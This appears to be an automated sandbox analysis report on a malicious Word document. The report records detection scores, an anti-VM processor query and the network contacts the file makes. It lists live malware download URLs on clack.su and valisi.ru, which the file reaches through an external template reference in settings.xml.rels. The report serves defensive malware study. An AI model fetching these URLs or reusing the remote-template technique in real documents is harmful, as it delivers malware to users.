4d f8 6f 39 ce 4e 36 be 16 1a 8b 30 a7 b1 19 4c 19 8d 22 1a 54 25 e5 d5 8c 4f 23 92 0d 09 e1 55 c4 a7 29 f1 ab 9c dc 71 01 b7 ba c2 e2 7c e1 ef e1 ef e6 97 31 61 53 ab 0f ea 9d 5e 27 77 16 c0 d7 d0 88 84 14 83 f0 02 46 48 bc 60 5b 49 f4 bb d0 49 ae 04 92 a3 c6 06 34 4a 91 17 b4 8f 22 8e de 9e a0 d7 57 c0 2a 42 07 40 08 4d 39 ca 58 30 57 9e f0 85 66 36 a4 b7 b9 e0 83 24 04 b8 20 f8 ec 36 b6 39 1b c7 9f 6d b9 c4 ba c9 b4 c3 03 5b 41 78 12 1a 25 ad da 4d a1 c3 25 50 b7 84 65 34 89 ed ba e5 ea d7 e0 66 9e 61 bf 3d 79 bd 02 15 81 01 5e 90 38 a4 fd 2b 69 80 60 db 39 c9 52 73 9a d4 dc 0d be c5 6a 54 48 74 6b 6b 42 e3 30 99 58 bd 49 4a 46 c9 0d 3d 23 1c ac 60 90 21 1f dd 6b d7 38 23 3f b3 48 6b 4b 5b cd da 97 f6 a5 9d 59 13 2b 61 83 4b 9b 8e f0 80 64 97 76 90 30 72 69 cb cd 97 76 ab 7e d7 aa 5f da 9a a9 01 2e d8 67 a5 f1 00 3e b2 64 cc 02 a2 b5 ef 35 30 e2 00 73 b9 3a 07 2b a1 ce 9d e0 52 78 01 8d 83 68 1c 0a e0 37 f0 0f 03 72 7d 0d 14 4f 80 22 6b 44 63 e0 fc 08 64 e2 bb af f7 70 b3 55 ef 3b 75 c7 f3 b0 b7 eb e1 46 d3 6b f5 fb ad e6 6e d3 db 75 ea da 6c b6 2f b8 ac f4 c7 71 c0 41 82 3a 31 13 93 1b f7 b7 98 21 6c c6 26 db 2f 66 10 d5 89 1a e7 7e 62 81 cd 01 99 27 11 b8 61 cc 75 61 83 a0 7a cd d8 e7 96 Data Ascii: c15
Source: classification engine Classification label: mal68.evad.winDOCX@2/5@3/1
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE File created: C:\Users\user\Desktop\~$_______19.03.docx Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\{66050E71-1D72-4227-BAD7-A2759737A87A} - OProcSessId.dat Jump to behavior
Source: ~WRD0000.tmp.0.dr OLE indicator, Word Document stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: _________19.03.docx Virustotal: Detection: 44%
Source: _________19.03.docx ReversingLabs: Detection: 41%
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process created: unknown unknown Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/theme/_rels/theme1.xml.rels
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = customXml/item2.xml
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = customXml/itemProps2.xml
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = customXml/item3.xml
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = customXml/itemProps3.xml
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = customXml/_rels/item3.xml.rels
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll Jump to behavior
Source: ~WRD0000.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior
barindex
Contains an external reference to another file
Source: settings.xml.rels Extracted files from sample: http://clack.su/fox.docx
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information queried: ProcessInformation Jump to behavior
windows-stand
Behavior
Click here to start
Slideshow Behavior Animation
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1668984 Sample: _________19.03.docx Startdate: 19/04/2025 Architecture: WINDOWS Score: 68 12 valisi.ru 2->12 14 clack.su 2->14 18 Suricata IDS alerts for network traffic 2->18 20 Antivirus detection for URL or domain 2->20 22 Multi AV Scanner detection for submitted file 2->22 24 Contains an external reference to another file 2->24 6 WINWORD.EXE 165 96 2->6         started        signatures3 process4 dnsIp5 16 clack.su 91.218.228.26, 49716, 49719, 49724 IHCRUInternet-HostingLtdMoscowRussiaRU Russian Federation 6->16 10 C:\Users\user\...\_________19.03.docx (copy), Microsoft 6->10 dropped file6
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
91.218.228.26
 valisi.ru Russian Federation
203226 IHCRUInternet-HostingLtdMoscowRussiaRU true

Contacted Domains

Name IP Active
valisi.ru 91.218.228.26 true
s-0005.dual-s-msedge.net 52.123.129.14 true
clack.su 91.218.228.26 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://clack.su/fox.docx true
  • Avira URL Cloud: malware
 unknown
http://valisi.ru/first.rtf true
  • Avira URL Cloud: malware
 unknown